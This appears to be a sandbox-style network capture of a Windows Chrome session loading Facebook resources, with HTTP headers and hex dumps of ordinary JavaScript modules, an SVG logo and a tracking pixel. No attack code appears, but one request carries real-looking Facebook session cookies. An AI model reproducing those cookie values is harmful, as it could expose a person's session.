                                                                                                                                                                                                                                  content-md5: 7NlAIdLIU8O43rggO6FzAA==
                                                                                                                                                                                                                                  Expires: Wed, 17 Sep 2025 21:28:43 GMT
                                                                                                                                                                                                                                  Cache-Control: public,max-age=31536000,immutable
                                                                                                                                                                                                                                  report-to: {"max_age":21600,"endpoints":[{"url":"https:\/\/www.xx.facebook.com\/ajax\/browser_error_reports\/"}],"group":"permissions_policy"}
                                                                                                                                                                                                                                  timing-allow-origin: *
                                                                                                                                                                                                                                  document-policy: force-load-at-top
                                                                                                                                                                                                                                  permissions-policy: accelerometer=(), attribution-reporting=(), autoplay=(), bluetooth=(), camera=(), ch-device-memory=(), ch-downlink=(), ch-dpr=(), ch-ect=(), ch-rtt=(), ch-save-data=(), ch-ua-arch=(), ch-ua-bitness=(), ch-viewport-height=(), ch-viewport-width=(), ch-width=(), clipboard-read=(), clipboard-write=(), compute-pressure=(), display-capture=(), encrypted-media=(), fullscreen=(self), gamepad=(), geolocation=(), gyroscope=(), hid=(), idle-detection=(), interest-cohort=(), keyboard-map=(), local-fonts=(), magnetometer=(), microphone=(), midi=(), otp-credentials=(), payment=(), picture-in-picture=(), private-state-token-issuance=(), publickey-credentials-get=(), screen-wake-lock=(), serial=(), shared-storage=(), shared-storage-select-url=(), private-state-token-redemption=(), usb=(), unload=(self), window-management=(), xr-spatial-tracking=();report-to="permissions_policy"
                                                                                                                                                                                                                                  cross-origin-resource-policy: cross-origin
                                                                                                                                                                                                                                  X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                  reporting-endpoints: permissions_policy="https://www.xx.facebook.com/ajax/browser_error_reports/"
                                                                                                                                                                                                                                  origin-agent-cluster: ?1
                                                                                                                                                                                                                                  X-FB-Debug: zUW2UCY9Za4hiEirYlccZh1JrcQPl8Xws3sDARmq2e9rdM9DpZXtrpH1DPRe29SAWf2oYIvvZklo+qpa5gcmNQ==
                                                                                                                                                                                                                                  Date: Sun, 29 Sep 2024 04:53:19 GMT
                                                                                                                                                                                                                                  X-FB-Connection-Quality: GOOD; q=0.7, rtt=89, rtx=0, c=14, mss=1392, tbw=3412, tp=-1, tpl=-1, uplat=3, ullat=-1
                                                                                                                                                                                                                                  Alt-Svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                  Content-Length: 2549
                                                                                                                                                                                                                                  2024-09-29 04:53:19 UTC1INData Raw: 3c
                                                                                                                                                                                                                                  Data Ascii: <
                                                                                                                                                                                                                                  2024-09-29 04:53:19 UTC2548INData Raw: 73 76 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 20 77 69 64 74 68 3d 22 31 30 39 30 22 20 68 65 69 67 68 74 3d 22 33 36 30 22 20 66 69 6c 6c 3d 22 6e 6f 6e 65 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 31 30 39 30 20 33 36 30 22 3e 0a 20 20 3c 70 61 74 68 20 66 69 6c 6c 3d 22 23 30 38 36 36 46 46 22 20 64 3d 22 4d 38 38 31 2e 35 38 33 20 32 35 37 2e 38 39 37 68 32 39 2e 34 38 76 2d 34 37 2e 36 39 36 6c 34 31 2e 31 33 37 20 34 37 2e 36 39 36 68 33 36 2e 30 37 32 6c 2d 34 37 2e 38 39 2d 35 34 2e 39 36 39 20 34 30 2e 39 30 39 2d 34 37 2e 36 36 33 68 2d 33 32 2e 38 32 35 6c 2d 33 37 2e 34 30 33 20 34 33 2e 39 33 76 2d 39 36 2e 39 38 32 6c 2d 32 39 2e 34 38 20 33 2e 38 36 34 76 31 35 31 2e 38
                                                                                                                                                                                                                                  Data Ascii: svg xmlns="http://www.w3.org/2000/svg" width="1090" height="360" fill="none" viewBox="0 0 1090 360"> <path fill="#0866FF" d="M881.583 257.897h29.48v-47.696l41.137 47.696h36.072l-47.89-54.969 40.909-47.663h-32.825l-37.403 43.93v-96.982l-29.48 3.864v151.8


                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                  37192.168.2.649766157.240.0.64431060C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                  2024-09-29 04:53:19 UTC374OUTGET /rsrc.php/v3/yr/r/OJuPnvrkEfZ.js HTTP/1.1
                                                                                                                                                                                                                                  Host: static.xx.fbcdn.net
                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                  Accept: */*
                                                                                                                                                                                                                                  Sec-Fetch-Site: none
                                                                                                                                                                                                                                  Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                  Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                  2024-09-29 04:53:19 UTC1929INHTTP/1.1 200 OK
                                                                                                                                                                                                                                  Vary: Accept-Encoding
                                                                                                                                                                                                                                  Content-Type: application/x-javascript; charset=utf-8
                                                                                                                                                                                                                                  Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                  Last-Modified: Mon, 01 Jan 2001 08:00:00 GMT
                                                                                                                                                                                                                                  content-md5: yF/Bm975u33ArWnQvO8H2A==
                                                                                                                                                                                                                                  Expires: Wed, 24 Sep 2025 14:52:14 GMT
                                                                                                                                                                                                                                  Cache-Control: public,max-age=31536000,immutable
                                                                                                                                                                                                                                  report-to: {"max_age":21600,"endpoints":[{"url":"https:\/\/www.xx.facebook.com\/ajax\/browser_error_reports\/"}],"group":"permissions_policy"}
                                                                                                                                                                                                                                  timing-allow-origin: *
                                                                                                                                                                                                                                  document-policy: force-load-at-top
                                                                                                                                                                                                                                  permissions-policy: accelerometer=(), attribution-reporting=(), autoplay=(), bluetooth=(), camera=(), ch-device-memory=(), ch-downlink=(), ch-dpr=(), ch-ect=(), ch-rtt=(), ch-save-data=(), ch-ua-arch=(), ch-ua-bitness=(), ch-viewport-height=(), ch-viewport-width=(), ch-width=(), clipboard-read=(), clipboard-write=(), compute-pressure=(), display-capture=(), encrypted-media=(), fullscreen=(self), gamepad=(), geolocation=(), gyroscope=(), hid=(), idle-detection=(), interest-cohort=(), keyboard-map=(), local-fonts=(), magnetometer=(), microphone=(), midi=(), otp-credentials=(), payment=(), picture-in-picture=(), private-state-token-issuance=(), publickey-credentials-get=(), screen-wake-lock=(), serial=(), shared-storage=(), shared-storage-select-url=(), private-state-token-redemption=(), usb=(), unload=(self), window-management=(), xr-spatial-tracking=();report-to="permissions_policy"
                                                                                                                                                                                                                                  cross-origin-resource-policy: cross-origin
                                                                                                                                                                                                                                  X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                  reporting-endpoints: permissions_policy="https://www.xx.facebook.com/ajax/browser_error_reports/"
                                                                                                                                                                                                                                  origin-agent-cluster: ?1
                                                                                                                                                                                                                                  X-FB-Debug: CVFWG0CMS6GUHcs5xAlRnV7Aj1ccrJQbJ0fQVx5P6Ncixeg9Vb3YG+MN8glcw+ktqdNk0nNaeAHRevp+wgTwHA==
                                                                                                                                                                                                                                  Date: Sun, 29 Sep 2024 04:53:19 GMT
                                                                                                                                                                                                                                  X-FB-Connection-Quality: GOOD; q=0.7, rtt=89, rtx=0, c=14, mss=1392, tbw=3411, tp=-1, tpl=-1, uplat=3, ullat=-1
                                                                                                                                                                                                                                  Alt-Svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                  Content-Length: 2078
                                                                                                                                                                                                                                  2024-09-29 04:53:19 UTC1INData Raw: 3b
                                                                                                                                                                                                                                  Data Ascii: ;
                                                                                                                                                                                                                                  2024-09-29 04:53:19 UTC2048INData Raw: 2f 2a 46 42 5f 50 4b 47 5f 44 45 4c 49 4d 2a 2f 0a 0a 5f 5f 64 28 22 44 65 66 65 72 72 65 64 22 2c 5b 22 50 72 6f 6d 69 73 65 22 5d 2c 28 66 75 6e 63 74 69 6f 6e 28 61 2c 62 2c 63 2c 64 2c 65 2c 66 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 76 61 72 20 67 3b 28 67 7c 7c 28 67 3d 62 28 22 50 72 6f 6d 69 73 65 22 29 29 29 2e 72 65 73 6f 6c 76 65 28 29 3b 61 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 61 28 61 29 7b 76 61 72 20 63 3d 74 68 69 73 3b 61 3d 61 7c 7c 67 7c 7c 28 67 3d 62 28 22 50 72 6f 6d 69 73 65 22 29 29 3b 74 68 69 73 2e 24 31 3d 21 31 3b 74 68 69 73 2e 24 32 3d 6e 65 77 20 61 28 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 63 2e 24 33 3d 61 2c 63 2e 24 34 3d 62 7d 29 7d 76 61 72 20 63 3d 61 2e 70 72 6f 74 6f 74 79 70 65 3b
                                                                                                                                                                                                                                  Data Ascii: /*FB_PKG_DELIM*/__d("Deferred",["Promise"],(function(a,b,c,d,e,f){"use strict";var g;(g||(g=b("Promise"))).resolve();a=function(){function a(a){var c=this;a=a||g||(g=b("Promise"));this.$1=!1;this.$2=new a(function(a,b){c.$3=a,c.$4=b})}var c=a.prototype;
                                                                                                                                                                                                                                  2024-09-29 04:53:19 UTC29INData Raw: 65 74 75 72 6e 20 61 7d 67 5b 22 64 65 66 61 75 6c 74 22 5d 3d 61 7d 29 2c 39 38 29 3b
                                                                                                                                                                                                                                  Data Ascii: eturn a}g["default"]=a}),98);


                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                  38192.168.2.649764157.240.0.64431060C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                  2024-09-29 04:53:19 UTC374OUTGET /rsrc.php/v3/y-/r/v87V0xuYr4I.js HTTP/1.1
                                                                                                                                                                                                                                  Host: static.xx.fbcdn.net
                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                  Accept: */*
                                                                                                                                                                                                                                  Sec-Fetch-Site: none
                                                                                                                                                                                                                                  Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                  Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                  2024-09-29 04:53:19 UTC1929INHTTP/1.1 200 OK
                                                                                                                                                                                                                                  Vary: Accept-Encoding
                                                                                                                                                                                                                                  Content-Type: application/x-javascript; charset=utf-8
                                                                                                                                                                                                                                  Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                  Last-Modified: Mon, 01 Jan 2001 08:00:00 GMT
                                                                                                                                                                                                                                  content-md5: rDEOmqaAM5ZkPMcF0pIIHw==
                                                                                                                                                                                                                                  Expires: Sun, 28 Sep 2025 16:53:39 GMT
                                                                                                                                                                                                                                  Cache-Control: public,max-age=31536000,immutable
                                                                                                                                                                                                                                  report-to: {"max_age":21600,"endpoints":[{"url":"https:\/\/www.xx.facebook.com\/ajax\/browser_error_reports\/"}],"group":"permissions_policy"}
                                                                                                                                                                                                                                  timing-allow-origin: *
                                                                                                                                                                                                                                  document-policy: force-load-at-top
                                                                                                                                                                                                                                  permissions-policy: accelerometer=(), attribution-reporting=(), autoplay=(), bluetooth=(), camera=(), ch-device-memory=(), ch-downlink=(), ch-dpr=(), ch-ect=(), ch-rtt=(), ch-save-data=(), ch-ua-arch=(), ch-ua-bitness=(), ch-viewport-height=(), ch-viewport-width=(), ch-width=(), clipboard-read=(), clipboard-write=(), compute-pressure=(), display-capture=(), encrypted-media=(), fullscreen=(self), gamepad=(), geolocation=(), gyroscope=(), hid=(), idle-detection=(), interest-cohort=(), keyboard-map=(), local-fonts=(), magnetometer=(), microphone=(), midi=(), otp-credentials=(), payment=(), picture-in-picture=(), private-state-token-issuance=(), publickey-credentials-get=(), screen-wake-lock=(), serial=(), shared-storage=(), shared-storage-select-url=(), private-state-token-redemption=(), usb=(), unload=(self), window-management=(), xr-spatial-tracking=();report-to="permissions_policy"
                                                                                                                                                                                                                                  cross-origin-resource-policy: cross-origin
                                                                                                                                                                                                                                  X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                  reporting-endpoints: permissions_policy="https://www.xx.facebook.com/ajax/browser_error_reports/"
                                                                                                                                                                                                                                  origin-agent-cluster: ?1
                                                                                                                                                                                                                                  X-FB-Debug: pLpXzYEtVYy6V3WOt8MDCnZAVTlGLDFH/BW57mbq2k+grVvsIBnMvfK5NunfxSB5qG6FGj0DkaFbgrdYxFPAMQ==
                                                                                                                                                                                                                                  Date: Sun, 29 Sep 2024 04:53:19 GMT
                                                                                                                                                                                                                                  X-FB-Connection-Quality: GOOD; q=0.7, rtt=88, rtx=0, c=14, mss=1392, tbw=3413, tp=-1, tpl=-1, uplat=4, ullat=-1
                                                                                                                                                                                                                                  Alt-Svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                  Content-Length: 5493
                                                                                                                                                                                                                                  2024-09-29 04:53:19 UTC1INData Raw: 3b
                                                                                                                                                                                                                                  Data Ascii: ;
                                                                                                                                                                                                                                  2024-09-29 04:53:19 UTC5492INData Raw: 2f 2a 46 42 5f 50 4b 47 5f 44 45 4c 49 4d 2a 2f 0a 0a 5f 5f 64 28 22 49 6e 74 6c 43 4c 44 52 4e 75 6d 62 65 72 54 79 70 65 30 33 22 2c 5b 22 49 6e 74 6c 56 61 72 69 61 74 69 6f 6e 73 22 5d 2c 28 66 75 6e 63 74 69 6f 6e 28 61 2c 62 2c 63 2c 64 2c 65 2c 66 2c 67 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 61 3d 7b 67 65 74 56 61 72 69 61 74 69 6f 6e 3a 66 75 6e 63 74 69 6f 6e 28 61 29 7b 69 66 28 61 3d 3d 3d 30 7c 7c 61 3d 3d 3d 31 29 72 65 74 75 72 6e 20 63 28 22 49 6e 74 6c 56 61 72 69 61 74 69 6f 6e 73 22 29 2e 4e 55 4d 42 45 52 5f 4f 4e 45 3b 65 6c 73 65 20 72 65 74 75 72 6e 20 63 28 22 49 6e 74 6c 56 61 72 69 61 74 69 6f 6e 73 22 29 2e 4e 55 4d 42 45 52 5f 4f 54 48 45 52 7d 7d 3b 62 3d 61 3b 67 5b 22 64 65 66 61 75 6c 74 22 5d 3d 62 7d 29 2c 39 38 29
                                                                                                                                                                                                                                  Data Ascii: /*FB_PKG_DELIM*/__d("IntlCLDRNumberType03",["IntlVariations"],(function(a,b,c,d,e,f,g){"use strict";a={getVariation:function(a){if(a===0||a===1)return c("IntlVariations").NUMBER_ONE;else return c("IntlVariations").NUMBER_OTHER}};b=a;g["default"]=b}),98)


                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                  39192.168.2.649767157.240.0.354431060C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                  2024-09-29 04:53:19 UTC454OUTGET /security/hsts-pixel.gif HTTP/1.1
                                                                                                                                                                                                                                  Host: facebook.com
                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                  Accept: */*
                                                                                                                                                                                                                                  Sec-Fetch-Site: none
                                                                                                                                                                                                                                  Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                  Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                  Cookie: fr=0QHepad51NLqNU46q..Bm-N07..AAA.0.0.Bm-N07.AWXuojQA4po; sb=O934ZizfugwK86As5FvnwEDL
                                                                                                                                                                                                                                  2024-09-29 04:53:19 UTC535INHTTP/1.1 200 OK
                                                                                                                                                                                                                                  Vary: Accept-Encoding
                                                                                                                                                                                                                                  Content-Type: image/gif
                                                                                                                                                                                                                                  reporting-endpoints: coop_report="https://www.facebook.com/browser_reporting/coop/?minimize=0", permissions_policy="https://www.facebook.com/ajax/browser_error_reports/"
                                                                                                                                                                                                                                  report-to: {"max_age":2592000,"endpoints":[{"url":"https:\/\/www.facebook.com\/browser_reporting\/coop\/?minimize=0"}],"group":"coop_report","include_subdomains":true}, {"max_age":21600,"endpoints":[{"url":"https:\/\/www.facebook.com\/ajax\/browser_error_reports\/"}],"group":"permissions_policy"}
                                                                                                                                                                                                                                  2024-09-29 04:53:19 UTC1859INData Raw: 63 6f 6e 74 65 6e 74 2d 73 65 63 75 72 69 74 79 2d 70 6f 6c 69 63 79 3a 20 64 65 66 61 75 6c 74 2d 73 72 63 20 64 61 74 61 3a 20 62 6c 6f 62 3a 20 27 73 65 6c 66 27 20 68 74 74 70 73 3a 2f 2f 2a 2e 66 62 73 62 78 2e 63 6f 6d 20 27 75 6e 73 61 66 65 2d 69 6e 6c 69 6e 65 27 20 2a 2e 66 61 63 65 62 6f 6f 6b 2e 63 6f 6d 20 2a 2e 66 62 63 64 6e 2e 6e 65 74 20 27 75 6e 73 61 66 65 2d 65 76 61 6c 27 3b 73 63 72 69 70 74 2d 73 72 63 20 2a 2e 66 61 63 65 62 6f 6f 6b 2e 63 6f 6d 20 2a 2e 66 62 63 64 6e 2e 6e 65 74 20 2a 2e 66 61 63 65 62 6f 6f 6b 2e 6e 65 74 20 31 32 37 2e 30 2e 30 2e 31 3a 2a 20 27 75 6e 73 61 66 65 2d 69 6e 6c 69 6e 65 27 20 62 6c 6f 62 3a 20 64 61 74 61 3a 20 27 73 65 6c 66 27 20 63 6f 6e 6e 65 63 74 2e 66 61 63 65 62 6f 6f 6b 2e 6e 65 74 20 27
                                                                                                                                                                                                                                  Data Ascii: content-security-policy: default-src data: blob: 'self' https://*.fbsbx.com 'unsafe-inline' *.facebook.com *.fbcdn.net 'unsafe-eval';script-src *.facebook.com *.fbcdn.net *.facebook.net 127.0.0.1:* 'unsafe-inline' blob: data: 'self' connect.facebook.net '
                                                                                                                                                                                                                                  2024-09-29 04:53:19 UTC1715INData Raw: 70 65 72 6d 69 73 73 69 6f 6e 73 2d 70 6f 6c 69 63 79 3a 20 61 63 63 65 6c 65 72 6f 6d 65 74 65 72 3d 28 29 2c 20 61 74 74 72 69 62 75 74 69 6f 6e 2d 72 65 70 6f 72 74 69 6e 67 3d 28 73 65 6c 66 29 2c 20 61 75 74 6f 70 6c 61 79 3d 28 29 2c 20 62 6c 75 65 74 6f 6f 74 68 3d 28 29 2c 20 62 72 6f 77 73 69 6e 67 2d 74 6f 70 69 63 73 3d 28 73 65 6c 66 29 2c 20 63 61 6d 65 72 61 3d 28 73 65 6c 66 29 2c 20 63 68 2d 64 65 76 69 63 65 2d 6d 65 6d 6f 72 79 3d 28 29 2c 20 63 68 2d 64 6f 77 6e 6c 69 6e 6b 3d 28 29 2c 20 63 68 2d 64 70 72 3d 28 29 2c 20 63 68 2d 65 63 74 3d 28 29 2c 20 63 68 2d 72 74 74 3d 28 29 2c 20 63 68 2d 73 61 76 65 2d 64 61 74 61 3d 28 29 2c 20 63 68 2d 75 61 2d 61 72 63 68 3d 28 29 2c 20 63 68 2d 75 61 2d 62 69 74 6e 65 73 73 3d 28 29 2c 20 63
                                                                                                                                                                                                                                  Data Ascii: permissions-policy: accelerometer=(), attribution-reporting=(self), autoplay=(), bluetooth=(), browsing-topics=(self), camera=(self), ch-device-memory=(), ch-downlink=(), ch-dpr=(), ch-ect=(), ch-rtt=(), ch-save-data=(), ch-ua-arch=(), ch-ua-bitness=(), c
                                                                                                                                                                                                                                  2024-09-29 04:53:19 UTC54INData Raw: 32 62 0d 0a 47 49 46 38 39 61 01 00 01 00 80 00 00 00 00 00 00 00 00 21 f9 04 01 00 00 00 00 2c 00 00 00 00 01 00 01 00 00 02 02 44 01 00 3b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                  Data Ascii: 2bGIF89a!,D;0


                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                  40192.168.2.649765157.240.0.64431060C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                  2024-09-29 04:53:19 UTC374OUTGET /rsrc.php/v3/ys/r/4zS6aBDBtHT.js HTTP/1.1
                                                                                                                                                                                                                                  Host: static.xx.fbcdn.net
                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                  Accept: */*
                                                                                                                                                                                                                                  Sec-Fetch-Site: none
                                                                                                                                                                                                                                  Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                  Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                  2024-09-29 04:53:19 UTC1929INHTTP/1.1 200 OK
                                                                                                                                                                                                                                  Vary: Accept-Encoding
                                                                                                                                                                                                                                  Content-Type: application/x-javascript; charset=utf-8
                                                                                                                                                                                                                                  Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                  Last-Modified: Mon, 01 Jan 2001 08:00:00 GMT
                                                                                                                                                                                                                                  content-md5: 7SY8y7UBL6gkDv/oCq1cwQ==
                                                                                                                                                                                                                                  Expires: Sat, 20 Sep 2025 09:58:34 GMT
                                                                                                                                                                                                                                  Cache-Control: public,max-age=31536000,immutable
                                                                                                                                                                                                                                  report-to: {"max_age":21600,"endpoints":[{"url":"https:\/\/www.xx.facebook.com\/ajax\/browser_error_reports\/"}],"group":"permissions_policy"}
                                                                                                                                                                                                                                  timing-allow-origin: *
                                                                                                                                                                                                                                  document-policy: force-load-at-top
                                                                                                                                                                                                                                  permissions-policy: accelerometer=(), attribution-reporting=(), autoplay=(), bluetooth=(), camera=(), ch-device-memory=(), ch-downlink=(), ch-dpr=(), ch-ect=(), ch-rtt=(), ch-save-data=(), ch-ua-arch=(), ch-ua-bitness=(), ch-viewport-height=(), ch-viewport-width=(), ch-width=(), clipboard-read=(), clipboard-write=(), compute-pressure=(), display-capture=(), encrypted-media=(), fullscreen=(self), gamepad=(), geolocation=(), gyroscope=(), hid=(), idle-detection=(), interest-cohort=(), keyboard-map=(), local-fonts=(), magnetometer=(), microphone=(), midi=(), otp-credentials=(), payment=(), picture-in-picture=(), private-state-token-issuance=(), publickey-credentials-get=(), screen-wake-lock=(), serial=(), shared-storage=(), shared-storage-select-url=(), private-state-token-redemption=(), usb=(), unload=(self), window-management=(), xr-spatial-tracking=();report-to="permissions_policy"
                                                                                                                                                                                                                                  cross-origin-resource-policy: cross-origin
                                                                                                                                                                                                                                  X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                  reporting-endpoints: permissions_policy="https://www.xx.facebook.com/ajax/browser_error_reports/"
                                                                                                                                                                                                                                  origin-agent-cluster: ?1
                                                                                                                                                                                                                                  X-FB-Debug: NHEy/Ywz3qCg2/yiac1LG/3LfG9APZslekPzLaoh0TF5JdOm2yOYhmxXsM6Xr5gKXUiHAd6wx7kUlrFYnBqBgA==
                                                                                                                                                                                                                                  Date: Sun, 29 Sep 2024 04:53:19 GMT
                                                                                                                                                                                                                                  X-FB-Connection-Quality: GOOD; q=0.7, rtt=93, rtx=0, c=14, mss=1392, tbw=3412, tp=-1, tpl=-1, uplat=4, ullat=-1
                                                                                                                                                                                                                                  Alt-Svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                  Content-Length: 9204
                                                                                                                                                                                                                                  2024-09-29 04:53:19 UTC1INData Raw: 3b
                                                                                                                                                                                                                                  Data Ascii: ;
                                                                                                                                                                                                                                  2024-09-29 04:53:19 UTC9203INData Raw: 2f 2a 46 42 5f 50 4b 47 5f 44 45 4c 49 4d 2a 2f 0a 0a 5f 5f 64 28 22 42 61 6e 7a 61 69 22 2c 5b 22 63 72 3a 37 33 38 33 22 5d 2c 28 66 75 6e 63 74 69 6f 6e 28 61 2c 62 2c 63 2c 64 2c 65 2c 66 2c 67 29 7b 67 5b 22 64 65 66 61 75 6c 74 22 5d 3d 62 28 22 63 72 3a 37 33 38 33 22 29 7d 29 2c 39 38 29 3b 0a 5f 5f 64 28 22 45 76 65 6e 74 45 6d 69 74 74 65 72 57 69 74 68 56 61 6c 69 64 61 74 69 6f 6e 22 2c 5b 22 42 61 73 65 45 76 65 6e 74 45 6d 69 74 74 65 72 22 5d 2c 28 66 75 6e 63 74 69 6f 6e 28 61 2c 62 2c 63 2c 64 2c 65 2c 66 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 61 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 62 61 62 65 6c 48 65 6c 70 65 72 73 2e 69 6e 68 65 72 69 74 73 4c 6f 6f 73 65 28 62 2c 61 29 3b 66 75 6e 63 74 69 6f 6e 20 62 28 62 2c 63 29 7b 76 61
                                                                                                                                                                                                                                  Data Ascii: /*FB_PKG_DELIM*/__d("Banzai",["cr:7383"],(function(a,b,c,d,e,f,g){g["default"]=b("cr:7383")}),98);__d("EventEmitterWithValidation",["BaseEventEmitter"],(function(a,b,c,d,e,f){"use strict";a=function(a){babelHelpers.inheritsLoose(b,a);function b(b,c){va


                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                  41192.168.2.649770157.240.251.94431060C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                  2024-09-29 04:53:19 UTC581OUTGET /rsrc.php/v3/yM/r/7QNyOKeJP6X.js HTTP/1.1
                                                                                                                                                                                                                                  Host: static.xx.fbcdn.net
                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                  Origin: https://www.facebook.com
                                                                                                                                                                                                                                  sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                  sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                  Accept: */*
                                                                                                                                                                                                                                  Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                  Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                  Sec-Fetch-Dest: script
                                                                                                                                                                                                                                  Referer: https://www.facebook.com/
                                                                                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                  2024-09-29 04:53:19 UTC1944INHTTP/1.1 200 OK
                                                                                                                                                                                                                                  Content-Type: application/x-javascript; charset=utf-8
                                                                                                                                                                                                                                  Last-Modified: Mon, 01 Jan 2001 08:00:00 GMT
                                                                                                                                                                                                                                  content-md5: GkBFaqN6ASU6ymlIG8mrvA==
                                                                                                                                                                                                                                  Expires: Wed, 24 Sep 2025 22:45:33 GMT
                                                                                                                                                                                                                                  Cache-Control: public,max-age=31536000,immutable
                                                                                                                                                                                                                                  report-to: {"max_age":21600,"endpoints":[{"url":"https:\/\/www.xx.facebook.com\/ajax\/browser_error_reports\/"}],"group":"permissions_policy"}
                                                                                                                                                                                                                                  timing-allow-origin: *
                                                                                                                                                                                                                                  document-policy: force-load-at-top
                                                                                                                                                                                                                                  permissions-policy: accelerometer=(), attribution-reporting=(), autoplay=(), bluetooth=(), camera=(), ch-device-memory=(), ch-downlink=(), ch-dpr=(), ch-ect=(), ch-rtt=(), ch-save-data=(), ch-ua-arch=(), ch-ua-bitness=(), ch-viewport-height=(), ch-viewport-width=(), ch-width=(), clipboard-read=(), clipboard-write=(), compute-pressure=(), display-capture=(), encrypted-media=(), fullscreen=(self), gamepad=(), geolocation=(), gyroscope=(), hid=(), idle-detection=(), interest-cohort=(), keyboard-map=(), local-fonts=(), magnetometer=(), microphone=(), midi=(), otp-credentials=(), payment=(), picture-in-picture=(), private-state-token-issuance=(), publickey-credentials-get=(), screen-wake-lock=(), serial=(), shared-storage=(), shared-storage-select-url=(), private-state-token-redemption=(), usb=(), unload=(self), window-management=(), xr-spatial-tracking=();report-to="permissions_policy"
                                                                                                                                                                                                                                  cross-origin-resource-policy: cross-origin
                                                                                                                                                                                                                                  X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                  reporting-endpoints: permissions_policy="https://www.xx.facebook.com/ajax/browser_error_reports/"
                                                                                                                                                                                                                                  origin-agent-cluster: ?1
